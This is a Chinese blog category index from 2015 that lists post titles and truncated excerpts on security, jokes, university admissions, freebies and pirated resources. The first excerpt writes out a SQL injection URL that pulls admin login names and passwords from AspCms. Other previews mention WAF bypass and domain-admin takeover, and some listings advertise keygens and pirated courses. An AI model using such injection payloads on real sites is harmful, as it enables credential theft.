分类「网络」下的文章
网络上的那些事儿


aspcms各版本漏洞0day集合
2015-12-02

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1———————————————————————— Powered by AspCms2.0 未验证权…

multipart/form-data PHP和Java通用的WAF绕过方法
2015-12-01

依旧是multipart/form-data,去年的时候说道了利用PHP的特性去绕过WAF.轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 原文简单的描述了PHP在处理POST请求的时候会解析multipart/form-data的内容。 那么这个multipart/form-data到底是个啥呢? …

GourdScan分布式被动注入漏洞扫描工具
2015-12-01

  GourdScan 之前俩个轮子中的一个的升级版,谈不上神器。 谈谈升级了哪些:1.更新了代理的方式,抛弃了占用内存极高的burp,采用了tornado进行代理,缺点是暂不支持https的代理。 2.更新了测试的逻辑,不会因为sqlmapapi的出错导致代理的挂起。 3.添加了分布式的支持,其实也就是通过mysql查询出正在运行任务最少的机器进…

各种设计软件.注册机.设计素材.网站设计教程.设计建筑站长必备资源
2015-12-01

资源超级合集【有各种设计软件.注册机…

七夕送给女友一个私人定制的专属礼物吧
2015-12-01

先看个成品(新手制作,雕刻师傅轻喷) 自行在某宝上搜索 【红木料头】挺便宜的,不放连接,不做推广…

PHP机器猫圈圈助手2.0网站源码
2015-11-29

机器猫圈圈助手2.0.zip…

女朋友和你妈同时掉水里
2015-11-29

女孩问男孩“我和你妈一起掉进河里了,你先救谁?”男孩沉默不语,女孩生气的走了。第二天再见到女孩,男孩手里拿了两套泳衣,说:“我教你游泳吧,到时候我们一起救我妈。”正当女孩把衣服脱下,准备换上泳衣时,男孩把她上了

什么是“985工程”?-实用高考填报前指南
2015-11-29

什么是“985工程”?-实用高考填报前指南1, "985 工程"高校 (1) ,什么是"985 工程"? 1998 年 5 月 4 日,江泽民总书记在庆祝北大建校 100 周年大会 上向全社会宣告:"为了实现现代化,我国要有若干所具有世界先进 水平的一流大学."为贯彻落实党中央科教兴国的战略和江泽民同志 的号召,教育部决定在实施"面向 21 世纪教育振兴行动计划"中, 重点支持北京大学, 清华大学等部分高等学校创建世界一流大学和高 水平大学,简称"985"工程. (2)"98…

数据分析之全球最大的免费WEB托管网站000WEBHOST数据泄漏
2015-11-27

0x01 前言000webhost是国外著名空间商Hosting24旗下的免费虚拟主机产品,号称“比收费虚拟主机更好用”。而确实如其所说的,该空间非常 优质和稳 定。而该空间提供商也见识到了中国人口之多,中国用户申请到有一定难度。他的口碑也确实不错。000webhost提供的免费服务:全能PHP空间 1.5G ,支持PHP(不支持ASP),支持绑定顶级域名,无任何广告,独立控制面板,免费创建Mysql数据库,FTP上传下载,在线压缩解压,支持 fopen()函数。…

【乌云安全中心快报】iOS 1.5 全新新新版本上线
2015-11-27

咳咳,第一次发帖诚惶诚恐。 欢迎大家进入本期也是首期的【乌云安全中心快报】。#本快报将不定期更新乌云安全中心的最新消息# ---…

钱宝的活动,免费撸U盘 数据线 键盘 鼠标 随身WIFI
2015-11-14

这个活动是注册送的,然后已经注册过的手机号码,将不能撸了。文档已经很详细了,不懂的再问我吧。补充一下,一个地址不要同时撸几个,因为这个要审核的,你同时撸他可以不给你发货的,还有就是做人太贪。补充:很多人说活动黄了,要绑定银行卡什么的,只要你按照教程操作,不要提现和退款 就不用绑定银行卡的,楼主已经到了2个U盘 一个手机高清3D放大器,不会的就不要说黄了 没用了 好吗?下图是楼主撸到的,…

《微信营销》2天一夜特训营售价39000(共10课)附PPT文档【无水印版】
2015-11-14

课程目录: 微信营销特训营-第0课(公开课)-三寿-微信…

[连续剧] [在线/下载][高清]蜀山战纪一、二季全二十集 12GB 720P 国语中字
2015-11-01

◎译  名 蜀山战纪第二季/剑侠传奇 ◎片  名 蜀山战纪之剑侠传奇 ◎年  代 2015…

《Violent Python》第六章Web Recon with Python (1)中文版(乌云python,英文爱好者翻译)
2015-10-31

连载介绍信息:http://zone.wooyun.org/content/23138原作者:Chris Katsaropoulos第一译者:@草帽小子-DJ第二译者:crown丶prince 第六章:WEB侦查 本章内容:1.使用Mechanize匿名浏览互联网…

得到内网域管理员的N种常见方法
2015-10-31

得到内网域管理员的5种常见方法from:http://blog.spiderlabs.com/2013/09/top-five-ways-spiderlabs-got-domain-admin-on-your-internal-network.htmlspiderlabs总结的,我简单翻译下,偶尔加点我的牢骚。1.Netbios and LLMNR Name Poisoning这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是…

dedecms 5.7 织梦建站仿站教程 送100套模板 seo技巧
2015-10-30

链接:http://pan.baidu.com/share/link?shareid=2828565115&uk=3325186542 密码:ud9r 赠品:链接:http://pan.baidu.com/share/link?shareid=2831718425&uk=3325186542 密码:tjwv[caption id="attachment_607" align="aligncenter" width="1393"]…

乌云众测在上海#安全牛第二届网络空间安全论坛#
2015-10-14

各位可爱的小伙伴们,乌云众测要去上海溜达一圈啦~10月16日(也就是后天),@zeracker 三哥将带着乌云的小伙伴参加安全牛第二届网络空间安全论坛“狙击金融安全新风险”【10.16上海站】,会上,小伙伴还将献上《众测如何助力金融安全》的演讲,欢迎各位踊跃来面基捧场(小龙虾嗨起来!~)会议时间:2015年10月16日 13:30 ~ 2015年10月16日 17:00会议地点:(上海静安)上海宏安瑞士大酒店3楼达沃斯厅

零基础入门学习Python
2015-10-14

这是由小甲鱼录制的全套Python教程,总共97集,分享给大家。下载地址:链接: http://pan.baidu.com/s/1dDdjpIx 密码: ketw视频截图:[caption id="attachment_597" align="aligncenter" width="1222"] Python[/caption]

我喜欢上了女朋友的闺蜜怎么办怎么办
2015-10-14

一次送女友的时候, 顺带她的闺 蜜,人很好,应该说女友也是人很好类型,非常正经的女孩,可是第一眼看到她闺 蜜就莫名其妙的感觉,虽然知道自己这样做不好,还是总盯着人家眼睛看,眼神对视的一刹那,似乎感觉到什么,这一辈子也没这样对一个女孩一见钟情。。。。。。。。。。。 女友闺 蜜我也能感受到 她也有那种感觉,可是她克制住了,甚至不跟我说话,她觉得这样不好,加了微 信后,我更加彷徨了,看到她朋友圈细腻的文字,不做作,不会拍些无脑自拍照和心灵鸡汤,认真的看每一本年,记录每一个地方,我深深…